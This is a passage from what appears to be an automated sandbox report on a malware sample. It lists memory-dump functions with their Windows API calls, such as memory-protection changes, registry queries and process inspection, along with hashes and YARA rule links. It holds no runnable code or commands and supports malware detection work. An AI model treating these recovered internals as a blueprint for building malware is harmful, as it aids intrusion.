GetLastError.KERNEL32(?,?,?,4D283A53), ref: 04637FB7
RtlRemoveVectoredExceptionHandler.NTDLL(046505B8), ref: 04637FCD

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
String ID:
API String ID: 2251957091-0
Opcode ID: 3e80bcb1c7b64e9d5bef1072983cebb69040a4904ab7b3f19dcc99e4675c7ca9
Instruction ID: 2dfd32447ca5b49c8339e98c3e0f4d4098517f54556aede53e0ccbdfd8901dc5
Opcode Fuzzy Hash: 3e80bcb1c7b64e9d5bef1072983cebb69040a4904ab7b3f19dcc99e4675c7ca9
Instruction Fuzzy Hash: 8131EEBE9041A19FDF10BBB4E88496EB7D4E799713B11952EF512D3240F738BD408B64

Uniqueness

Uniqueness Score: -1.00%

Function 046391A2, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 046391CD
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 046391DA
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04639266
GetModuleHandleA.KERNEL32(00000000), ref: 04639271
RtlImageNtHeader.NTDLL(00000000), ref: 0463927A
RtlExitUserThread.NTDLL(00000000), ref: 0463928F

Part of subcall function 0462EDB4: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04639208,?), ref: 0462EDBC
Part of subcall function 0462EDB4: GetVersion.KERNEL32 ref: 0462EDCB
Part of subcall function 0462EDB4: GetCurrentProcessId.KERNEL32 ref: 0462EDE7
Part of subcall function 0462EDB4: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0462EE04

Part of subcall function 0463EE86: memcpy.NTDLL(00000000,00000000,?,?,00000000,00000001,00000000,?,?,?,04639216,?), ref: 0463EEE5

Part of subcall function 04638DDB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0463434B), ref: 04638E01

Part of subcall function 04640D2F: GetModuleHandleA.KERNEL32(4E52454B,046480F0,?,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640D50
Part of subcall function 04640D2F: GetProcAddress.KERNEL32(00000000,6F577349), ref: 04640D69
Part of subcall function 04640D2F: OpenProcess.KERNEL32(00000400,00000000,0462E3EB,046480F0,?,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640D86
Part of subcall function 04640D2F: IsWow64Process.KERNEL32(00000000,00000000,046480F0,?,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640D97
Part of subcall function 04640D2F: FindCloseChangeNotification.KERNELBASE(00000000,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640DAA

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
String ID:
API String ID: 2581485877-0
Opcode ID: a8c881495fd24b58da8dbfd93be19604baf2b3f58f291ade9e9437e9ec995909
Instruction ID: a712bb4156dd684e92ba3de7c373b93bc6f61e5d1ead3a6b65d11c3357e3583f
Opcode Fuzzy Hash: a8c881495fd24b58da8dbfd93be19604baf2b3f58f291ade9e9437e9ec995909
Instruction Fuzzy Hash: B931E5B5A00558EFCB21EFA4DC89EAEB7B4EF84755B104129E506E7240F674AD04CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 046318AC, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04648380), ref: 046318C3

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: e2a7dd80578a55afafee8b747a4dc34d18a37fe5872f9da259ba3e2168329837
Instruction ID: 06392ebbe4078fd08678349a9c5df1d391adcec4f5e42d1dc4808ade07f97d28
Opcode Fuzzy Hash: e2a7dd80578a55afafee8b747a4dc34d18a37fe5872f9da259ba3e2168329837
Instruction Fuzzy Hash: F6F05835B00269AB8B20DE59D885DEBBBA8FF56755B014115FD04DB260E330FD06CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 04635CEA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04640E7B: VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,00000000,?), ref: 04640EA0
Part of subcall function 04640E7B: GetLastError.KERNEL32 ref: 04640EA8
Part of subcall function 04640E7B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 04640EBF
Part of subcall function 04640E7B: VirtualProtect.KERNEL32(?,?,-392CC87E,?), ref: 04640EE4

GetLastError.KERNEL32(00000000,00000004,?,?,?,00000000,?,046445F0,0000001C,04622B4B,?,?,00000001,?,?,?), ref: 04635E45

Part of subcall function 046256C1: lstrlen.KERNEL32(?,?), ref: 046256F9
Part of subcall function 046256C1: lstrcpy.KERNEL32(00000000,?), ref: 04625710
Part of subcall function 046256C1: StrChrA.SHLWAPI(00000000,0000002E), ref: 04625719
Part of subcall function 046256C1: GetModuleHandleA.KERNEL32(00000000), ref: 04625737

VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,?), ref: 04635DC2
VirtualProtect.KERNELBASE(?,00000004,?,?,?,?,00000000,00000004,?,?,?,00000000,?,046445F0,0000001C,04622B4B), ref: 04635DDD
RtlEnterCriticalSection.NTDLL(04648380), ref: 04635E02
RtlLeaveCriticalSection.NTDLL(04648380), ref: 04635E20

Part of subcall function 04640E7B: SetLastError.KERNEL32(?), ref: 04640EED

Strings

, xrefs: 04635DB1

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-3916222277
Opcode ID: e4ce317fd9abee931b538809846a0a344957e2e10d68efba1f542850b5aa2b1d
Instruction ID: d23394d5fbda3d2ddaae572c4dbf623e2c57027e3de70a9bfc217f12150d2ea6
Opcode Fuzzy Hash: e4ce317fd9abee931b538809846a0a344957e2e10d68efba1f542850b5aa2b1d
Instruction Fuzzy Hash: 7C417A75900719EFDB10DFA4C948AAEBBB4FF58311F04811AE915A7250E774FA50CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 046395EC, Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 04640332: memset.NTDLL ref: 0464033C

OpenEventA.KERNEL32(00000002,00000000,04648274,?,00000000,00000000,?,0463B93E,?,?,?,?,?,?,?,04637FB0), ref: 04639686
SetEvent.KERNEL32(00000000,?,0463B93E,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 04639693
Sleep.KERNELBASE(00000BB8,?,0463B93E,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 0463969E
ResetEvent.KERNEL32(00000000,?,0463B93E,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 046396A5
CloseHandle.KERNEL32(00000000,?,0463B93E,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 046396AC
GetShellWindow.USER32 ref: 046396B7
GetWindowThreadProcessId.USER32(00000000), ref: 046396BE

Part of subcall function 04626116: RegCloseKey.ADVAPI32(?,?,004F0053), ref: 04626199

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
String ID:
API String ID: 53838381-0
Opcode ID: 05247a29e4997bd63409c502cdd75a4698d6205824e2b874f7e5e7ac28253f3b
Instruction ID: c8895667d90116aa0df123b0b99c3f8d4bf9033c5b79a07afb30f42c98976f65
Opcode Fuzzy Hash: 05247a29e4997bd63409c502cdd75a4698d6205824e2b874f7e5e7ac28253f3b
Instruction Fuzzy Hash: 0D21C47A201950BBEB107B669C48E2B7B69EBCA751B155009F51A83201FA79BC01CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04629C98, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,80000000,?,?,04644600,00000018,0463700D,?,00000201,04647A1C,046479D4,-0000000C,?), ref: 04629CDB
VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,73B75520,?,?,80000000,?,?,04644600,00000018,0463700D), ref: 04629D66
RtlEnterCriticalSection.NTDLL(04648380), ref: 04629D8F
RtlLeaveCriticalSection.NTDLL(04648380), ref: 04629DAD

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: 255d1a0128292a317ee6b663cb06b7bdcffb0187ac17c6598e0e594f82395dd9
Instruction ID: 94c833a0dbb025e4908afe4bd349e46b5c64dd1da5f67fe586bc26a41e246b3e
Opcode Fuzzy Hash: 255d1a0128292a317ee6b663cb06b7bdcffb0187ac17c6598e0e594f82395dd9
Instruction Fuzzy Hash: 98418CB4A00A15EFDB21DF65C984AAEBBF4FF88300F10891AE915D7210E774EA55DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0462E982, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,?,05D3BBF1,05D3BBE5,05D3BBE5,?,046283D6,?,05D3BBE5,?,?), ref: 0462E9A7
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0462E9BE
HeapFree.KERNEL32(00000000,00000000,?,05D3BBF1,05D3BBE5,05D3BBE5,?,046283D6,?,05D3BBE5,?,?,?,74666F53,00000000), ref: 0462E9D9
RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,?,05D3BBF1,05D3BBE5,05D3BBE5,?,046283D6,?,05D3BBE5,?,?), ref: 0462E9F8

Strings

Soft, xrefs: 0462EA00

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateFree
String ID: Soft
API String ID: 4267586637-3753413193
Opcode ID: 7429159481eeb48627208b2f32ba68fa95b5ba6db21e03938d37b37d60c3e370
Instruction ID: cb8b0bcb72d029a974f2b63c6cfa1a50ee90f3e14a25cbce82ae9d7f39dd3d5e
Opcode Fuzzy Hash: 7429159481eeb48627208b2f32ba68fa95b5ba6db21e03938d37b37d60c3e370
Instruction Fuzzy Hash: 43113D7A900528FFDF12DF99DD85DEEBBBDEB89750B104066F90193210E2726E50DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04626213, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0462113F: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04621154
Part of subcall function 0462113F: lstrlen.KERNEL32(?,00000000,00000000,?,?,?), ref: 0462117D

RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 0462624B
RtlAllocateHeap.NTDLL(00000000,?), ref: 0462625F
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 04626279
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 04626295
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 046262A3

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: de805ad4e587296251b268765d22742292df68f1bef4dd5b48d75f68bf2b945b
Instruction ID: 77351bdf7ee6e8e8d2c05f649d16dda70d7765ed6ff602e22dab917ac1166f7a
Opcode Fuzzy Hash: de805ad4e587296251b268765d22742292df68f1bef4dd5b48d75f68bf2b945b
Instruction Fuzzy Hash: E1115BB6100519BFDF019F94CD85CAE7B7EFB88355B100466F90193210F771AD519F60

Uniqueness

Uniqueness Score: -1.00%

Function 04640D2F, Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(4E52454B,046480F0,?,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640D50
GetProcAddress.KERNEL32(00000000,6F577349), ref: 04640D69
OpenProcess.KERNEL32(00000400,00000000,0462E3EB,046480F0,?,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640D86
IsWow64Process.KERNEL32(00000000,00000000,046480F0,?,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640D97
FindCloseChangeNotification.KERNELBASE(00000000,?,?,0462E3EB,00000000,046480F0,?,00000000), ref: 04640DAA

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
String ID:
API String ID: 1712524627-0
Opcode ID: 2c1bd415140653847f04160fd2a58ea1a0e33ca0b236f68d3c62187c6919f806
Instruction ID: a6629233b66526a3c6fc3d252c7b9edb819a570db334dfb69bb0df6088386a9d
Opcode Fuzzy Hash: 2c1bd415140653847f04160fd2a58ea1a0e33ca0b236f68d3c62187c6919f806
Instruction Fuzzy Hash: A801407D500619EFCF11EF64D84999A7BB8FBD67517109127E905E3200F734AE45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04640E7B, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,00000000,?), ref: 04640EA0
GetLastError.KERNEL32 ref: 04640EA8
VirtualQuery.KERNEL32(?,?,0000001C), ref: 04640EBF
VirtualProtect.KERNEL32(?,?,-392CC87E,?), ref: 04640EE4
SetLastError.KERNEL32(?), ref: 04640EED

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID:
API String ID: 148356745-0
Opcode ID: d456d74f1f535300b41c2e213612d04ba93eb3d2f839b2d47d5ea16bb8a0c968
Instruction ID: 0a03990a694afb4896c98b0673504bdce281929a6d87d22318cba9696a195e8e
Opcode Fuzzy Hash: d456d74f1f535300b41c2e213612d04ba93eb3d2f839b2d47d5ea16bb8a0c968
Instruction Fuzzy Hash: E8014C3A50011ABFDF119FA5DC418AEBBBDFF983147008026FA0193250EB75EA64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0462835A, Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON

Download Yara Rule

APIs

Part of subcall function 046379DF: lstrlen.KERNEL32(?,00000000,?,00000027,04648168,?,00000000,61636F4C,00000001), ref: 04637A15
Part of subcall function 046379DF: lstrcpy.KERNEL32(00000000,00000000), ref: 04637A39
Part of subcall function 046379DF: lstrcat.KERNEL32(00000000,00000000), ref: 04637A41

RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00020119,?,?,74666F53,00000000), ref: 046283A1
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,74666F53,00000000), ref: 046283B7
RegCloseKey.KERNELBASE(?,?,05D3BBE5,?,?,?,74666F53,00000000), ref: 04628400

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID:
API String ID: 4131162436-0
Opcode ID: ad56db9ed569c4d82d87f1628848dcee8220e6f3f3c26aa38161481826449710
Instruction ID: 0c6184c23f310375764ca9df4b1c8ce2f1fd69ff17c334f1f18ae0fbee5a6d23
Opcode Fuzzy Hash: ad56db9ed569c4d82d87f1628848dcee8220e6f3f3c26aa38161481826449710
Instruction Fuzzy Hash: 93212976900619BFDF00EF94DD84C9EBBBCEB65258B00417AEA05A3211F730AE559FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0462113F, Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04621154
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0462115E
lstrlen.KERNEL32(?,00000000,00000000,?,?,?), ref: 0462117D

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: 5da95580df72ab831bbe657138deadd36e3da56ba784c276766ff5ca7b02ba8e
Instruction ID: 5abc67db5abad955da477735dd21e934cffa0a50c9a151b892a75ec1421f1b32
Opcode Fuzzy Hash: 5da95580df72ab831bbe657138deadd36e3da56ba784c276766ff5ca7b02ba8e
Instruction Fuzzy Hash: 2DF09676104218BFDB115F90DC99FEB7B7CEB86765F108005FD4695241F671AA84CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0463CFE3, Relevance: 3.1, APIs: 2, Instructions: 81registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0462113F: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04621154
Part of subcall function 0462113F: lstrlen.KERNEL32(?,00000000,00000000,?,?,?), ref: 0462117D

RegQueryValueExA.KERNELBASE(00000000,745EC740,00000000,?,04647068,046304D5,05D3C0DC,0464706E,00000000,?,046247DB,05D3C0DC,745EC740,00000000,046304D5), ref: 0463D037
RegCloseKey.ADVAPI32(00000000,?,046247DB,05D3C0DC,745EC740,00000000,046304D5), ref: 0463D084

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CloseCreateQueryValuelstrlen
String ID:
API String ID: 971780412-0
Opcode ID: 1908c152bd30dd64522d97b7012a1c94776dba59a0afbc035359587afb505e1a
Instruction ID: 69d6c9c502893a262617ae7112054e8ca04e115a164aaced79101e332a356fb3
Opcode Fuzzy Hash: 1908c152bd30dd64522d97b7012a1c94776dba59a0afbc035359587afb505e1a
Instruction Fuzzy Hash: 4F313079D01218EFDF21DFD4E88499EBBB8EB84B52F10555AE904A3340E3746E85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04640A44, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,04641265,63699BC3,?,?,00000000), ref: 04640A81
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04641265), ref: 04640AE2

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: 3817a261a923c1de3ab0317a2bec5a44e16f6be2b812795eb48b476c769ef3f8
Instruction ID: 1e832af6628cf719a955c2d1be3db1d8577c402419a3fa38be6a6823bc335313
Opcode Fuzzy Hash: 3817a261a923c1de3ab0317a2bec5a44e16f6be2b812795eb48b476c769ef3f8
Instruction Fuzzy Hash: 0711DAB9900518EBDF00EBA4DA44A9EB7FCEF94305F101066A901E3691EB38AA44DB65

Uniqueness

Uniqueness Score: -1.00%

Function 046280C6, Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(04647FDC), ref: 046280DB

Part of subcall function 046391A2: GetSystemTimeAsFileTime.KERNEL32(?), ref: 046391CD
Part of subcall function 046391A2: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 046391DA
Part of subcall function 046391A2: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04639266
Part of subcall function 046391A2: GetModuleHandleA.KERNEL32(00000000), ref: 04639271
Part of subcall function 046391A2: RtlImageNtHeader.NTDLL(00000000), ref: 0463927A
Part of subcall function 046391A2: RtlExitUserThread.NTDLL(00000000), ref: 0463928F

InterlockedDecrement.KERNEL32(04647FDC), ref: 046280FF

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
String ID:
API String ID: 1011034841-0
Opcode ID: 39c56e7fb50d5c9a06ab25138ce14ff7d8ebaeb31535d6afdf1c69f4948195ca
Instruction ID: 958746650a80bd03dbca042149519714150d4b813ac88bcdf49fe237c18ddf82
Opcode Fuzzy Hash: 39c56e7fb50d5c9a06ab25138ce14ff7d8ebaeb31535d6afdf1c69f4948195ca
Instruction Fuzzy Hash: 86E09231224932BBEB217B729F0CB6AA641BBA0B41F004618F846F2190F710E830CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 0463B63D, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(41564441,00000001,00000000,73B74D40,?,?,00000000,04641254,?,?,?,?,?,?,?,04637FB0), ref: 0463B652

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7603ee3c1be23a04f6bc36d1aa616421de3cab9f50c988a7a736dfee3e793ad7
Instruction ID: 7e953b89d7be890debcaddbd99cc26f3476770a82a7f69cc5b4c21c1f976e34b
Opcode Fuzzy Hash: 7603ee3c1be23a04f6bc36d1aa616421de3cab9f50c988a7a736dfee3e793ad7
Instruction Fuzzy Hash: F2315EB5E00255EFDF10EF98C8849A9BBB4FB95725B1540AAE204AB312F730BD41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04636F81, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,046479D4,-0000000C,?,?,?,0463DDC0,00000006,?,73B75520,?,04623F76,?), ref: 04636FBC

Part of subcall function 046318AC: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04648380), ref: 046318C3

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: 65ecd4de34137ccb99f91c792deec56bb76067952e4e03d379be7ef185d4a8a8
Instruction ID: a55a6bb09069f536e7b0c169497a0165eaec7437ca740712e7cda5090914d868
Opcode Fuzzy Hash: 65ecd4de34137ccb99f91c792deec56bb76067952e4e03d379be7ef185d4a8a8
Instruction Fuzzy Hash: 3B218EB6600684FFDB30CF99C88196A77E5EF54396B18842DF9558B250F731F900DB60

Uniqueness

Uniqueness Score: -1.00%

Function 046420A6, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 04642098

Part of subcall function 046421EB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002462C,04620000), ref: 04642264

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: a6465c3cbd7f0092439ecfeed1273f775a97a591d8fe3c176f054be1584bbcb6
Instruction ID: cc0951a00fd3679ffc1e118bcbed580ac3cade37fce36bf6e2b8503e6ffbfb3c
Opcode Fuzzy Hash: a6465c3cbd7f0092439ecfeed1273f775a97a591d8fe3c176f054be1584bbcb6
Instruction Fuzzy Hash: 68A001D63A9102BE3F4862A16D2BE3A065DD5C8EE53318A9EF60286540B8803A565839

Uniqueness

Uniqueness Score: -1.00%

Function 0464208B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 04642098

Part of subcall function 046421EB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002462C,04620000), ref: 04642264

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: ccd0e17235e7a61d647fe7f96b0bbd9adeda8b62fabf03a590ac9c42cb4ff105
Instruction ID: 5d96d4241c4ee30057d6b795ae80a7eda8b2dd288ec4eafb71cccef4ada2d96f
Opcode Fuzzy Hash: ccd0e17235e7a61d647fe7f96b0bbd9adeda8b62fabf03a590ac9c42cb4ff105
Instruction Fuzzy Hash: A7A011E23A8200BE3F08A2A02C2BF3A020CC0C0EA0330828EF20282000B8803A020838

Uniqueness

Uniqueness Score: -1.00%

Function 0464182F, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 00b02ae00e58dcbf73135b5d621cd638c21dc77030edc6168606a544b8abec96
Instruction ID: d3229af66341f1d3e012e0644b512d19dcd4a0bf7a98c1896019428ba113db4b
Opcode Fuzzy Hash: 00b02ae00e58dcbf73135b5d621cd638c21dc77030edc6168606a544b8abec96
Instruction Fuzzy Hash: 73B01279100200ABCF014B00DE06F057A21E7E0B01F005010B305000A097390C30EB18

Uniqueness

Uniqueness Score: -1.00%

Function 04634ACE, Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04626213: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 0462624B
Part of subcall function 04626213: RtlAllocateHeap.NTDLL(00000000,?), ref: 0462625F
Part of subcall function 04626213: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 04626279
Part of subcall function 04626213: RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 046262A3

HeapFree.KERNEL32(00000000,?,05D3BB3C,?,?,?,00000000,?,?,?,?,0462A1E8,?), ref: 04634B5E

Part of subcall function 04637C7F: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,04631DFE,00000000,00000001,-00000007,?,00000000), ref: 04637CA1

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID:
API String ID: 1301464996-0
Opcode ID: 8483a211c7000596e9729169de8270d4e287dd4c379995495ce000af4c866fd9
Instruction ID: 29198fd5da15c1089fc1813b1b9273a0eb05ae3d61ffb751ff52c86ba9c425f5
Opcode Fuzzy Hash: 8483a211c7000596e9729169de8270d4e287dd4c379995495ce000af4c866fd9
Instruction Fuzzy Hash: CF119179604241EBDB14DB58DCC0FA9B7A9EB98752F1000A9E6029B340FB74BD01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0462A6B3, Relevance: 1.3, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 0462A72A

Part of subcall function 04641844: HeapFree.KERNEL32(00000000,?,0463DF8D,00000000), ref: 04641850

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateErrorFreeLast
String ID:
API String ID: 3102831662-0
Opcode ID: ffe10c5514c58be926b4abeecb9a1288f9f03d2908d8cbf29962ed6907811150
Instruction ID: 9cf12ffe7ddb0785f97175e6870f0072a3ed506e0b7af88aa40e6e867e24c59d
Opcode Fuzzy Hash: ffe10c5514c58be926b4abeecb9a1288f9f03d2908d8cbf29962ed6907811150
Instruction Fuzzy Hash: 4111E135A00618BBDB11EFE8C994BDEBBB9EF91394F214059E40097200FBB5EA41CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04640332, Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0464033C

Part of subcall function 0462835A: RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00020119,?,?,74666F53,00000000), ref: 046283A1
Part of subcall function 0462835A: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,74666F53,00000000), ref: 046283B7
Part of subcall function 0462835A: RegCloseKey.KERNELBASE(?,?,05D3BBE5,?,?,?,74666F53,00000000), ref: 04628400

Memory Dump Source

